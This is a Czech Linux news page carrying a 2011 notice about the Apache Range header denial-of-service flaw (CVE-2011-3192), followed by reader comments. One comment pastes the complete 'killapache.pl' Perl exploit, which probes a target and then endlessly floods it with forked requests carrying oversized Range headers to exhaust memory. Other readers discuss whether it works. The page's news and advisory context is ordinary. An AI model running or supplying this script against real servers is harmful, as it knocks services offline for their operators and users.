abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 23:33 | IT novinky

    Čeští policisté společně se svými tureckými kolegy zadrželi 51 lidí, kteří se podle kriminalistů podíleli na provozu podvodného call centra v Istanbulu. Skupina je spojena s 1173 případy podvodů na českých občanech, při kterých vznikla škoda přes 553 milionů korun.

    Ladislav Hagara | Komentářů: 0
    3.7. 03:55 | Nová verze

    Immich byl vydán v nové verzi 3.0.0. Jedná se o alternativu k výchozím aplikacím od Googlu a Applu pro správu fotografií a videí umožňující vlastní hosting serveru Immich. K vyzkoušení je demo. Immich je součástí balíčků open source aplikací FUTO. Zdrojové kódy jsou k dispozici na GitHubu pod licencí AGPL-3.0.

    Ladislav Hagara | Komentářů: 5
    3.7. 02:55 | IT novinky

    Společnost Juno Computers prodávající počítače s předinstalovaným Linuxem má nově v nabídce linuxový tablet Juno Tab 4 - WiFi. Na výběr je Debian, Ubuntu a Kubuntu. Předobjednat jej lze za 949 liber (26 500 korun).

    Ladislav Hagara | Komentářů: 0
    3.7. 01:22 | Nová verze

    Podman (Pod Manager), nástroj umožňující vytvářet a provozovat kontejnery, aniž by uživatel potřeboval práva roota, byl vydán v nové major verzi 6.0.0. Přehled novinek v poznámkách k vydání. Řešena je i vážná bezpečnostní chyba CVE-2026-57231.

    Ladislav Hagara | Komentářů: 0
    3.7. 00:11 | IT novinky

    Společnost Sony oznámila, že od ledna 2028 přestane vydávat nové hry pro PlayStation na fyzických discích. Všechny budoucí tituly budou dostupné výhradně v digitální podobě na PlayStation Store.

    Ladislav Hagara | Komentářů: 6
    2.7. 16:55 | Nová verze

    Google Chrome 150 byl prohlášen za stabilní. Nejnovější stabilní verze 150.0.7871.46 přináší řadu novinek. Podrobný přehled v poznámkách k vydání. Opraveno bylo 433 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.

    Ladislav Hagara | Komentářů: 0
    2.7. 13:00 | Nová verze

    Soudní dvůr Evropské unie potvrdil rekordní pokutu 4,125 miliardy eur (100 miliard Kč) americké technologické firmě Google ze skupiny Alphabet. Pokutu firmě v roce 2018 vyměřila Evropská komise (EK) za to, že Google podle ní zneužívá operačního systému Android k potlačení konkurence na trhu vyhledávacích služeb.

    Ladislav Hagara | Komentářů: 17
    2.7. 12:44 | IT novinky

    Administrativa amerického prezidenta Donalda Trumpa povolila firmě Anthropic obnovit plný přístup klientů k modelům umělé inteligence (AI) Fable 5 a Mythos 5. Ty byly nedostupné bezmála tři týdny kvůli bezpečnostním obavám vlády, třebaže americké ministerstvo obchodu minulý pátek povolilo omezený přístup k modelu Mythos 5 pro některé „důvěryhodné“ domácí organizace.

    Ladislav Hagara | Komentářů: 1
    2.7. 12:22 | Zajímavý článek

    Francúzska organizácia na ochranu spotrebiteľa, po viac než ôsmych rokoch skúmania, žaluje Epson za plánované zastarávanie tlačiarní. Súd sa začína dnes, 2. 7. 2026, vo francúzskom Nanterre.

    Vlado99 | Komentářů: 9
    2.7. 03:00 | Zajímavý software

    Erin Catto, autor open source 2D fyzikálního enginu Box2D (Wikipedie), představil nový 3D fyzikální engine Box3D. Engine je již používán ve hře The Legend of California.

    Ladislav Hagara | Komentářů: 0
    Které desktopové prostředí na Linuxu používáte?
     (11%)
     (8%)
     (2%)
     (17%)
     (31%)
     (4%)
     (6%)
     (2%)
     (16%)
     (25%)
    Celkem 2053 hlasů
     Komentářů: 30, poslední 3.4. 20:20
    Rozcestník


    DoS zranitelnost webového serveru Apache

    Byla objevena DoS zranitelnost webového serveru Apache (Range header DoS vulnerability Apache HTTPD 1.3/2.x, CVE-2011-3192, Bugtraq ID: 49303). V oficiálním bezpečnostním upozornění se uvádí 5 doporučení pro zmírnění dopadů útoků. Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána do 48 hodin.

    25.8.2011 19:20 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    25.8.2011 21:39 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    #By Kingcope
    #Year 2011
    #
    # Will result in swapping memory to filesystem on the remote side
    # plus killing of processes when running out of swap space.
    # Remote System becomes unstable.
    #
    
    use IO::Socket;
    use Parallel::ForkManager;
    
    sub usage {
    	print "Apache Remote Denial of Service (memory exhaustion)\n";
    	print "by Kingcope\n";
    	print "usage: perl killapache.pl <host> [numforks]\n";
    	print "example: perl killapache.pl www.example.com 50\n";
    }
    
    sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
    =09
    $pm =3D new Parallel::ForkManager($numforks);
    
    $|=3D1;
    srand(time());
    $p =3D "";
    for ($k=3D0;$k<1300;$k++) {
    	$p .=3D ",5-$k";
    }
    
    for ($k=3D0;$k<$numforks;$k++) {
    my $pid =3D $pm->start and next; =09
    =09
    $x =3D "";
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    while(<$sock>) {
    }
     $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
    }
    
    sub testapache {
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    $x =3D <$sock>;
    if ($x =3D~ /Partial/) {
    	print "host seems vuln\n";
    	return 1;=09
    } else {
    	return 0;=09
    }
    }
    
    if ($#ARGV < 0) {
    	usage;
    	exit;=09
    }
    
    if ($#ARGV > 1) {
    	$numforks =3D $ARGV[1];
    } else {$numforks =3D 50;}
    
    $v =3D testapache();
    if ($v =3D=3D 0) {
    	print "Host does not seem vulnerable\n";
    	exit;=09
    }
    while(1) {
    killapache();
    }
    
    NN
    25.8.2011 21:43 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110820/848b4dca/attachment.obj
    25.8.2011 22:09 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Utoci to a... nic sa nedeje. Aspon na mojom serveri.
    MMMMMMMMM avatar 25.8.2011 22:28 MMMMMMMMM | skóre: 44 | blog: unstable | Valašsko :-)
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Host does not seem vulnerable (to vidím zase já, když "útočím" na své servery)
    25.8.2011 22:38 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Skus nejaky vacsi subor, potom to bude posielat po 50 paketoch a nic z toho.
    pepe_ avatar 25.8.2011 22:43 pepe_ | skóre: 48
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru

    A funguje to i s lighttpd/mysql/php5 s cgifixem ?

    26.8.2011 19:07 Ladislav Hagara | skóre: 107 | blog: Ride the Raven
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Aktualizace bezpečnostního upozornění.
    Problémem je nejenom 'Range' header ale také 'Range-Request' header.
    Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána snad do 24 hodin.
    Otto Šabart avatar 27.8.2011 01:10 Otto Šabart | skóre: 13 | blog: KatiePC blog
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Exploit vyšel na exploit-db.com už před 8 dny... No zkoušel jsem ho a také mi nefunguje.
    *´¨)¸.·´¨)¸.·***·>>> www.seberm.com

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.